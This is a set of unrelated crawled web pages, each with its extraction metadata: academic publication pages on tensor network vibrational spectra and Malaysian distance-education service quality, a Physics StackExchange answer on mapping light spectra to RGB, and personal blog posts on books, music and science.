{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2128966748714447, "perplexity": 7559.020499160702}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027314721.74/warc/CC-MAIN-20190819093231-20190819115231-00498.warc.gz"}
https://larsson-research.de/publication/larsson-ttns-2019/
# Computing vibrational eigenstates with tree tensor network states (TTNS) [Editor's Pick] ### Abstract During my postdoctoral studies in the group of Prof. G. Chan (Caltech), as side project, I worked on the computation of vibrational spectra using tree-tensor network states (TTNS). There, I applied methods developed in the condensed matter community to molecular systems. Compared to established approaches for computing vibrational spectra, such as the multilayer multiconfiguration time-dependent Hartree (ML-MCTDH) method, the new approach is faster and much more robust and the diagrammatic language from condensed matter physics I use gains much more insights. I am currently working on using the TTNS method to compute high-lying vibrational states of the Zundel ion. Type Publication The Journal of Chemical Physics
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8147500157356262, "perplexity": 2239.009793090402}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178366477.52/warc/CC-MAIN-20210303073439-20210303103439-00497.warc.gz"}
https://dergipark.org.tr/tojde/issue/43090/522368
| | | | ## Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia #### Fazelina Sahul HAMID [1] , Nick YIP [2] ##### 87 183 Assessment of the quality of distance education institutions has become an important issue that needs to be addressed to ensure program survival. This study uses SERVPERF model to identify the differences that exists in students’ perception of service quality in public and private universities in Malaysia that offer distance education. Our study confirms that this model is valid and reliable. We find that the students’ overall perception of service quality is lower in all five dimensions of service quality for the private universities. The dimensions that influence overall service quality are noticeably different for public and private universities. This suggests that private universities need to improve their service provision in order to remain competitive. Managerial implications of the major findings are discussed. Service Quality, SERVPERF model, distance education; higher learning institutions • Abdullah, F. (2006). Measuring service quality in higher education: three instruments compared. International Journal of Research & Method in Education, 29(1), 71–89. https://doi.org/10.1080/01406720500537445 Agus, A., Barker, S., & Kandampully, J. (2007). An exploratory study of service quality in the Malaysian public service sector. International Journal of Quality & Reliability Management, 24(2), 177–190. https://doi.org/http://dx.doi.org/10.1108/02656710710722284 Ancis, J. R. (1998). Cultural competency training at a distance: Challenges and strategies. Journal of Counseling & Development, 76(2), 134–143. Anderson, J. C., & Gerbing, D. W. (1988). Structural equation modeling in practice: A review and recommended two-step approach. Psychological Bulletin, 103(3), 411–423. Angell, R. J., Heffernan, T. W., & Megicks, P. (2008). Service quality in postgraduate education. Quality Assurance in Education, 16(3), 236–254. https://doi.org/10.1108/09684880810886259 Bateson, J. (1977). Do We Need Service Marketing. Marketing Consumer Services: New Insights. Marketing Science Institute, Report, 77–115. Bayraktaroglu, G., & Atrek, B. (2010). Testing the superiority and dimensionality of SERVQUAL vs. SERVPERF in higher education. The Quality Management Journal, 17(1), 47–59. Brochado, A. (2009). Comparing alternative instruments to measure service quality in higher education. Quality Assurance in Education, 17(2), 174–190. Brookes, M., & Becket, N. (2007). Quality management in Higher Education: A review of international issues and practice. International Journal of Quality and Standards. Burke, J. (1998). The Internet Highway: A New Learning Tool for Accounting Students. New Accountant, 14(1). Buttle, F. (1996). SERVQUAL: Review, critique, research agenda. European Journal of Marketing, 30(1), 8–32. Caemmerer, B., & Dewar, A. (2013). A comparison of private and public sector performance. Journal of Applied Business Research, 29(5), 1451–1458. Retrieved from http://www.scopus.com/inward/record.url?eid=2-s2.0-84887271883&partnerID=40&md5=112992ca3f0f0e5d57d058fed1bfe841 Carman, J. M. (1990). Consumer perceptions of service quality: An assessment of the SERVQUAL dimensions. Journal of Retailing, 66(1), 33–55. Carrilat, F. A., Jaramillo, F., & Mulki, J. P. (2009). Examining the impact of service quality: a meta-analysis of empirical evidence. Journal of Marketing Theory and Practice, 17(2), 95–110. Chapman, R. (1979). Pricing policy and the college choice process. Research in Higher Education, 10(37), 57. Chiu, Y. T. H., & Hofer, K. M. (2015). Service innovation and usage intention: a cross-market analysis. Journal of Service Management, 26(3), 516–538. https://doi.org/http://dx.doi.org/10.1108/JOSM-10-2014-0274 Chow, G. C. (1960). Tests of Equality between Sets of Coefficients in Two Linear Regressions. Econometrica: Journal of the Econometric Society, 591–605. Cook-Sather, A. (2002). Authorizing Students’ Perspectives: Toward Trust, Dialogue, and Change in Education. Educational Researcher, 31, 3–14. Cronin Jr, J. J., & Taylor, S. A. (1992). Measuring service quality: a reexamination and extension. The Journal of Marketing, 55–68. Crosby, P. B. (1979). Quality is Free. New York: McGraw Hill. Dabholkar, P. A., Shepherd, C. D., & Thorpe, D. I. (2000). A comprehensive framework for service quality: an investigation of critical conceptual and measurement issues through a longitudinal study. Journal of Retailing, 76(2), 139–73. Devlin, J. F., Gwynne, A. L., & Ennew, C. T. (2002). The antecedents of service expectations. The Service Industries Journal, 22(4), 117–136. Donaldson, B., & McNicholas, C. (2004). Understanding the postgraduate education market for UK based students: a review and empirical study. International Journal of Nonprofit and Voluntary Sector Marketing, 9(4), 346–360. https://doi.org/10.1002/nvsm.259 Douglas, J., Douglas, A., & Barnes, B. (2006). Measuring student satisfaction at a UK university. Quality Assurance in Education, 14, 251–267. Eisenberg, M. B., & Small, R. V. (1993). Information-based education: An investigation of the nature and role of information attributes in education. Information Processing & Management, 29, 263–275. Elliott, K. M., & Shin, D. (2002). Student Satisfaction: an alternative approach to assessing this important concept. Journal of Higher Education Policy & Management, 24, 197–209. Ford, J. B., Joseph, M., & Joseph, B. (1999). Importance-performance analysis as a strategic tool for service marketers: the case of service quality perceptions of business students in New Zealand and the USA. Journal of Services Marketing, 13(2), 171–186. https://doi.org/10.1108/08876049910266068 Fornell, C., & Larcker, D. F. (1981). Evaluating Structural Equation Models With Unobservable Variables and Measurement Error. Journal of Marketing Research, 18(1), 39–50. https://doi.org/10.2307/3151312 Furrer, O., Liu, B. S.-C., & Sudharshan, D. (2000). The Relationships between Culture and Service Quality Perceptions: Basis for Cross-Cultural Market Segmentation and Resource Allocation. Journal of Service Research, 2(4), 355–371. https://doi.org/10.1177/109467050024004 Glasser, W. (1990). The quality school: Managing students without coercion. New York: Perennial Library. Gliem, J. A., & Gliem, R. R. (2003). Calculating, interpreting, and reporting Cronbach’s alpha reliability coefficient for Likert-type scales, (1992), 82–88. Gounaris, S. (2005). Measuring service quality in b2b services: an evaluation of the SERVQUAL scale vis-à-vis the INDSERV scale. Journal of Services Marketing, 19(6), 421–435. https://doi.org/10.1108/08876040510620193 Gronroos, C. (1983). Strategic Management and Marketing in The Service Sector. Cambridge, MA. Hilmi, M. F., & Ali, H. M. (2012). Service Quality and Ease-of-Use of a Learning Management System Portal : Perceptions of Distance Learners, 599–602. Huang, R. T. (2007). Improving the Service Quality of Distance Education. International Journal of Instructional Technology and Distance Learning, 5(4), 21–29. Hui-feng, F. W. Q. J. (2010). Case Study on Evaluation of Student Perceived Quality of Learning Service in Distance Education - Based on the “Content-Character” Framework and the SERVPERF Method. Modern Educational Technology, 12, 22. Jain, R., Sinha, G., & Sahney, S. (2011). Conceptualizing service quality in higher education. Asian Journal on Quality, 12, 296–314. https://doi.org/10.1108/15982681111187128 Jain, S. K., & Gupta, G. (2004). Measuring Service Quality: SERVQUAL vs. SERVPERF Scales. Vikalpa: The Journal for Decision Makers, 29(2), 25–37. Retrieved from http://search.ebscohost.com/login.aspx?direct=true&db=bth&AN=14024712&site=ehost-live James, E., & Benjamin, G. (1988). Public Policy and Private Education in Japan. London: Macmillan. • Jusoh, A., Omain, S. Z., Abdul Majid, N., & Shamsuddin, A. S. (2004). Service quality in higher education: Management student’s perspective. Kadir, S. L. S. A., Abdullah, M., & Agus, A. (2000). On service improvement capacity index: a case study of the public service sector in Malaysia. Total Quality Management, 11(4–6), 837–843. Kotze, T. G., & Plessis, P. F. (2003). Students as “co-producers” of education: a proposed model of student socialisation and participation at tertiary instituitions. Quality Assurance in Education, 11, 186–201. Le Blanc, G., & Nguyen, N. (1999). Listening to the customer’s voice: examining perceived service value among business college students. The International Journal of Educational Management, 13, 187–198. Lizzio, A., Wilson, K., & Simons, R. (2002). University Students’ Perceptions of the Learning Environment and Academic Outcomes: implications for theory and practice. Studies in Higher Education, 27(27). Mazumder, Q. H. (2014). Analysis of Quality in Public and Private Universities in Bangladesh and USA. International Journal of Evaluation and Research in Education, 3(2), 99–108. Ministry of Education Malaysia. (2014). National Education Statistic:Higher education Sector 2013. Ministry of Education Malaysia. Retrieved from http://www.moe.gov.my/cms/upload_files/publicationfile/2014/pubfile_file_002043.pdf Moisescu, O. I., & Gica, O. A. (2013). SERVQUAL Versus SERVPERF: Modeling Customer Satisfaction and Loyalty as a Function of Service Quality in Travel Agencies. Studia Universitatis Babes-Bolyai, 58(3), 3–19. Molesworth, M., Nixon, E., & Scullion, R. (2009). Having, being and higher education: the marketisation of the university and the transformation of the student into consumer. Teaching in Higher Education, 14, 277–287. Myers, R. H. (1990). (1990), Classical and Modern Regression With Applications, (2nd ed.). Boston, MA.: PWS-KENT. Parasuraman, A., Zeithaml, V., & Berry, L. (1985). A conceptual model of service quality and its implications for future research. Journal of Marketing, 49, 41–50. Parasuraman, A., Zeithaml, V., & Berry, L. (1988). SERVQUAL: a multiple-item scale for measuring customer perceptions of service quality. Journal of Retailing, 64, 12–40. Park, A. R., & Ha, H. (2013). Comparative analysis of methodologies to evaluate air cargo carriers’ service quality: Focusing on SERVQUAL and SERVPERF. Journal of International Logistics and Trade, 11(2), 29-40-46. Peters, T. J., Waterman, R. H., & Jones, I. (1982). In search of excellence: Lessons from America’s best-run companies. Picciano, A. G. (2002). Beyond student perceptions: issues of interaction, presence, and performance in an online course. Journal of Asynchronous Learning Networks, 6, 21–40. Poon, W., Low, K. L., & Yong, D. G. (2004). A study of Web-based learning (WBL) environment in Malaysia,. The International Journal of Educational Management, 18(6), 374–385. Raemah, A. H., & Rosli, M. (2011). Comparing Commitment to Service Quality Among Academic Staffs’ in Private and Public Malaysian Universities. Journal of International Management Studies, 6(1), 1–8. Rashid, Z. A., & Latif, L. A. (2004). Perceived Service Quality and Satisfaction in Distance Education, 1–16. Redding, P. (2005). The evolving interpretations of customers in higher education: empowering the elusive. International Journal of Consumer Studies, 29, 409–417. Rigotti, S., & Pitt, L. (1992). SERVQUAL as a measuring instrument for service provider gaps in business schools. Management Research News, 15(3), 9–17. Romero, L., & Rey, E. (2004a). Competition between public and private universities: quality, prices and exams. Economics Series 23, (November). Retrieved from http://e-archivo.uc3m.es:8080/handle/10016/329 Romero, L., & Rey, E. (2004b). Competition between public and private universities: quality, prices and exams. Economics Series 23, (November). San, N. M. (2010). Impact of Service Quality, Satisfaction, and Personal Factors on Students in Open Distance Learning Institutions in Malaysia. Open University Malaysia. Sander, P., & Sanders, L. (2003). Measuring confidence in academic study: A summary report. Electronic Journal of Research in Educational Psychology, 5–3, 113–130. Sander, P., Stevenson, K., King, M., & Coates, D. (2000). University Students’ Expectations of Teaching. Studies in Higher Education, 25, 309–323. Sim, H. K. C., & Idrus, R. M. (2003). Student Satisfaction in Malaysia: Customer-focused learner support. The Asian Society of Open and Distance Education, 1(1), 69–77. Simonson, M., Schlosser, C., & Orellana, A. (2011). Distance education research: A review of the literature. Journal of Computing in Higher Education, 23(2–3), 124–142. https://doi.org/10.1007/s12528-011-9045-8 Stodnick, M., & Rogers, P. (2008). Using SERVQUAL to measure the quality of the classroom experience. Decision Sciences Journal of Innovative Education, 6(1), 115–133. Sultan, P., & Yin Wong, H. (2010). Service quality in higher education – a review and research agenda. International Journal of Quality and Service Sciences, 2(2), 259–272. https://doi.org/10.1108/17566691011057393 Syson, F. (2008). The student as coproducer of their own education: a service marketing perspective. Conference of the CLTR: Transitions and Transformations Developing Learners and Learning Environments. Taner, T., & Antony, J. (2006). Comparing public and private hospital care service quality in Turkey. Leadership in Health Services, 19, 1–10. Tapscott, D., & Williams, A. D. (2010). Innovating the 21st Century University: It’s Time. EDUCAUSE Review, 45, 16–29. Tayyab, M. H., & Rajput, A. (2014). Service Quality Orientation with Customer Satisfaction and Customer Loyalty Revisited Through Literature. Middle-East Journal of Scientific Research, 21(3), 550–555. https://doi.org/10.5829/idosi.mejsr.2014.21.03.21137 Telford, R., & Masson, R. (2015). The congruence of quality values in higher education. Quality Assurance in Education, 13, 107–119. Tenth Malaysia Plan 2011-2015. http://www.pmo.gov.my/dokumenattached/RMK/RMK10_E.pdf Terpstra, D. E., & Honoree, A. L. (2009). The effects of different teaching, research, and service emphases on individual and organizational outcomes in higher education institutions. Journal of Education for Business, 84, 169–176. Tilak, J. B. G. (1991). The privatisation of higher education. Prospects, XXI(2), 227–239. Udo, G. J., Bagchi, K. K., & Kirs, P. J. (2011). Using SERVQUAL to assess the quality of e-learning experience. Computers in Human Behavior, 27(3), 1272–1283. https://doi.org/10.1016/j.chb.2011.01.009 Vinzant, J. C. (1996). Strategic Management and Total Quality Management: Challenges and Choices. Public Administration Quarterly, 20(2), 201–219. Voss, R., Gruber, T., & Szmigin, I. (2007). Service quality in higher education: The role of student expectations. Journal of Business Research, 60, 949–959. Wilkinson, R., & Yussof, I. (2005). Public and Private Provision of Higher Education in Malaysia: A Comparative Analysis. Higher Education, 50(3), 361–386. https://doi.org/10.1007/s10734-004-6354-0 Woodall, T., Hiller, A., & Resnick, S. (2014). Making sense of higher education: students as consumers and the value of the university experience. Studies in Higher Education, 39(1), 48–67. Zaibaf, M., Taherikia, F., & Fakharian, M. (2013). Effect of Perceived Service Quality on Customer Satisfaction in Hospitality Industry: Gronroos’ Service Quality Model Development. Journal of Hospitality Marketing & Management, 22(5), 490–504. https://doi.org/10.1080/19368623.2012.670893 Zeithaml, V. A. (1988). of Consumer Perceptions A Means-End Value : Quality , and and Model Synthesis of Evidence, 52(July), 2–22. Zeithaml, V., Bitner, M., & Gremler, D. (2006). Services Marketing – Integrating Customer Focus across the Firm. New York: McGraw-Hill Primary Language en Social Articles Orcid: 0000-0002-9140-9789Author: Fazelina Sahul HAMID (Primary Author) Orcid: 0000-0003-4550-8994Author: Nick YIP Publication Date: January 1, 2019 Bibtex @research article { tojde522368, journal = {Turkish Online Journal of Distance Education}, issn = {1302-6488}, address = {Anadolu University}, year = {2019}, volume = {20}, pages = {17 - 34}, doi = {10.17718/tojde.522368}, title = {Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia}, key = {cite}, author = {HAMID, Fazelina Sahul and YIP, Nick} } APA HAMID, F , YIP, N . (2019). Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia. Turkish Online Journal of Distance Education, 20 (1), 17-34. DOI: 10.17718/tojde.522368 MLA HAMID, F , YIP, N . "Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia". Turkish Online Journal of Distance Education 20 (2019): 17-34 Chicago HAMID, F , YIP, N . "Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia". Turkish Online Journal of Distance Education 20 (2019): 17-34 RIS TY - JOUR T1 - Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia AU - Fazelina Sahul HAMID , Nick YIP Y1 - 2019 PY - 2019 N1 - doi: 10.17718/tojde.522368 DO - 10.17718/tojde.522368 T2 - Turkish Online Journal of Distance Education JF - Journal JO - JOR SP - 17 EP - 34 VL - 20 IS - 1 SN - 1302-6488- M3 - doi: 10.17718/tojde.522368 UR - https://doi.org/10.17718/tojde.522368 Y2 - 2018 ER - EndNote %0 Turkish Online Journal of Distance Education Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia %A Fazelina Sahul HAMID , Nick YIP %T Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia %D 2019 %J Turkish Online Journal of Distance Education %P 1302-6488- %V 20 %N 1 %R doi: 10.17718/tojde.522368 %U 10.17718/tojde.522368 ISNAD HAMID, Fazelina Sahul , YIP, Nick . "Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia". Turkish Online Journal of Distance Education 20 / 1 (January 2019): 17-34. https://doi.org/10.17718/tojde.522368 AMA HAMID F , YIP N . Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia. Turkish Online Journal of Distance Education. 2019; 20(1): 17-34. Vancouver HAMID F , YIP N . Comparing Service Quality in Public vs Private Distance Education Institutions: Evidence Based on Malaysia. Turkish Online Journal of Distance Education. 2019; 20(1): 34-17.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.24179477989673615, "perplexity": 15564.55636260494}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-35/segments/1566027321696.96/warc/CC-MAIN-20190824194521-20190824220521-00466.warc.gz"}
https://ecommons.cornell.edu/handle/1813/323/browse?type=author&value=Jennifer%2C+Burlingame
Now showing items 1-1 of 1 • #### The ABC's: Atherosclerosis, Blood Flow, and the Carotid Artery  (1999-01-10) The effects of blood flow were analyzed in the carotid artery, using computer aided engineering software (FIDAP and GAMBIT). The study was conducted because patients that have atherosclerosis often have plaque build up ...
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8633103370666504, "perplexity": 12743.866358752359}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656104585887.84/warc/CC-MAIN-20220705144321-20220705174321-00536.warc.gz"}
http://physics.stackexchange.com/questions/18557/visible-light-spectrum-to-color-space
Visible light spectrum to color space I need to be able to convert an arbitrary emission spectrum in the visible spectrum range (i.e. for every wavelength between 380 and 780, I have a number between 0 and 1 that represents the "intensity" or dominance of that wavelength), and I need to be able to map any given spectrum into a particular color space (for now I need RGB or CIE-XYZ). Is it possible? For the spectrum say I have the emission spectrum of a white light, then every wavelength in the spectrum will have an intensity of 1, whereas for a green-bluish light I'd have most of the wavelengths between 500 and 550 with an intensity close to 1, with other wavelengths gradually dropping in intensity. So the first spectrum should be converted to pure white whereas the other one would be converted to a green-bluish color in any color space. Is there a way to do this? - – Colin K Dec 21 '11 at 0:31 Also, this is a classic optics homework question. – Colin K Dec 21 '11 at 0:31 This isn't homework and I'm not an optic physics student, I just happened to need to solve this problem and needed some guidance because I didn't understand what I found online via google. Thanks for the link to the question though. – Thomas Dec 21 '11 at 0:53 White light is not a flat spectrum, it's whatever our eyes perceive as white. White is typically modeled by “standard illuminants”, such as D65 or D50, which mimic average daylight or sunlight spectra. – Edgar Bonet Dec 21 '11 at 9:04 1 Answer Human eye has three types of color receptors which respond differently to different parts of the spectrum. See this chart. One way to tackle your challenge is to basically simulate what the eye does: you take the spectrum as input, calculate how much it would excite each of the three color receptors based on their sensitivity to different parts of the spectrum and then use the three resulting numbers as RGB corresponding to the spectrum. In order to compute the excitation level, you can integrate the product of the sensitivity SC(λ) of each of the three color receptors with your spectral power distribution P(λ) to obtain the three RGB numbers: $$R = \int_{0}^{+\infty} S_R(\lambda) P(\lambda) d\lambda$$ $$G = \int_{0}^{+\infty} S_G(\lambda) P(\lambda) d\lambda$$ $$B = \int_{0}^{+\infty} S_B(\lambda) P(\lambda) d\lambda$$ For prototyping you can probably just assume the sensitivity SC(λ) functions to be appropriately scaled and translated Gaussian functions of the wavelength. As you refine your model you should seek better sensitivity functions for each of the three types of color receptors. - +1 my thoughts exactly :-) It would be great to find numerical data about the sensitivity functions somewhere. – David Z Dec 21 '11 at 0:23 There are standard sensitivity functions produced from decades of experimentation. They are maintained by the International Commission on Illumination (CIE). You can find all of that data on the CIE website. – Colin K Dec 21 '11 at 0:43 Thanks! I used the chart and quickly worked out the mean and sd's for the normal distributions of each color component and obtained this result with (RMean = 570, RSD = 70, GMean = 530, GSD = 50, BMean = 440 and BSD = 40): link. It's still missing the purple band on the left and a few other colors but that's because my approximation is pretty bad, I'll be looking at the CIE site to find the sensitivity functions. Thanks! – Thomas Dec 21 '11 at 0:55
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 3, "x-ck12": 0, "texerror": 0, "math_score": 0.6371665596961975, "perplexity": 530.2288115737646}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701160950.71/warc/CC-MAIN-20160205193920-00291-ip-10-236-182-209.ec2.internal.warc.gz"}
https://mumamme.wordpress.com/page/2/
## Over the Wall Probably the only thing that is more difficult to do in mainland China than to log onto Facebook is to log onto WordPress. I have to climb over the wall. As Pink Floyd would ask, “Am I just another brick in the wall?” ## The City of Two Tales Hong Kong is the city of two tales. Around the universities where I have studied at, it was quite, young and innocent. The sea is harbored by the small bay, like we are by the libraries. In the neighborhoods at Sheung Wan where I live, life unfolds every corner of its diversity. The smell of the sea becomes the smell of the fish. This is the life that local people are living. Before I could realized it, I found myself already chatting with the old doorman in my broken Cantonese. ## The Surgeon This may freak people out, but I crazily think that a good scientist should be as good as a good surgeon: They should be the combination of extraordinary familiarity with the subject and extraordinary intuition in his field. His expertise should be accumulated through millions of times of surgery experience, through the weirdest and toughest cases that he tried hard to fix. His wisdom should give him excellent intuitions in cases where nobody has complete knowledge before a treatment has been performed. Once he grows old, a good surgeon should still be able to perform a basic surgery completely with his own hands. Once he grows old, a good scientist should still be able to derive an equation confidently on the blackboard. No patient wants to put his/her life in the hands of the second-best surgeon. No good question wants to put its answer in the hands of second-best scientist. There is no shame in not being the best, though. But the bottom line is that, if you do it, you should keep going for the best. I know this is crazy thinking, and may earn me a risky and bumpy path. But after all, life has so many other places to keep peace for me. ## Grothendieck Maths people got surprised when I laughed at some Chinese translation of Grothendieck, because they do not think I shall have heard of him. The fact is that I definitely have NO knowledge about algebraic geometry. But I got to hear some stories and myths(among which the fact that his nationality is “none” is the most hilarious) about him through reading the book The Mathematician’s Brain. It is an intriguing and heart-soothing book! Many of my friends have read it, and I recommend it to the rest of them that have not read it. ## Where you want, where it wants The moment I woke up this morning, I noticed that the curve of my hair does not match my expectation.That reminded me of what my hair-dresser said about hair when she trimmed my hair last month: “Don’t worry. Sometimes it goes where you want, and sometime it  goes where it wants.” ## Before and After I just came back from today’s concert by Chicago Symphony Orchestra. It was fabulous. I am really into symphonies (a switch from concertos) recently, and Brahms No.2 was just beyond words. The following stream of thoughts came to me BEFORE the performance: Art and science incredibly mirror each other, in that both involve a process of creating and defining a set of criteria. The criteria is for those who practice it, as well as for those who wish to admire them. Without knowing the standard, one may be able to tell the worst art or science from others, but cannot tell which one of the avant-garde is truly valuable. The standard is subtle, but not trivial. The value of art and science is known only to those who have learned them well enough. Moreover, both art and science contain elements that are drastically different from “problem-solving” for engineers. They explore and experiment with the underlying structures of the problem, but not merely for the purpose of solving it. This is good and bad. On the bright side, they raise questions and reveal insights that are naturally ignored by the engineer. On the dark side, because the answer to “what is important” for art and science is soft and not known to anyone on earth, it is subject to those in possession of power. Unlike what Plato has envisioned in “The Republic”, those with power are not necessary who deserve the power. In fact, they are usually those who have the strongest desire and lust for power. Thus, this opens up space for the human lust for power to exercise and even rule. A danger, in a sense. The following stream of thoughts came to me AFTER the performance: Who cares? The sensational music rules! ## Coldplay? Anyone finds the new album of Coldplay, Mylo Xyloto, unsatisfactory? Because I do. I have to go back to some of their impressive old songs that I enjoyed, such as The Scientist, to reconstruct my fondness of this band. Well, “Nobody said it was easy.” ## The Voiceless Song Once in a while I wish I were not as sensitive as I actually am. If things are going to happen anyway, let them happen. If there is nothing that I could do to change about something, I shall go on by myself. Just don’t take any detours. Keep working. In any case, live for the present and the future. ## The Prospective Book Shopper Having pre-ordered three books on Amazon, I suspect that I have turned from retrospective book shopper to prospective book shopper. Pre-ordering means that I pay online (at a claimed-to-be discount guaranteed price) a book before it is published. Ideally (which never happened), the book will be delivered to me in no time of its publication. The first book I pre-ordered last year was Daniel Kahneman’s Thinking, Fast and Slow. I finished it. It was an impressive read! I recommend it to everybody. This year, I have ordered to books: 1. Why Nations Fail, by Acemoglu and Robinson. 2.The Social Conquest of Earth, by Wilson. The former will come out March 20, and the latter April 9. If I go broke someday, it would be due to my prospective book-shopping, because I am spending in advance against future income flows. ## Democratizing Knowledge and Garbage Democratizing Knowledge to valuable ideas is what $\LaTeX$ is to good writing. The relation implicit in both of the above two pairs is: there is no correlation. If we are thinking garbage, democratizing knowledge merely mobilizes our garbage. If we are writing garbage, $\LaTeX$ merely visualizes our garbage.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 2, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.22438952326774597, "perplexity": 1977.4608669010927}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-43/segments/1508187826283.88/warc/CC-MAIN-20171023183146-20171023203146-00601.warc.gz"}
https://www.hotukdeals.com/deals/xbox-one-with-kinect-holiday-value-bundle-tesco-direct-for-179-2542266
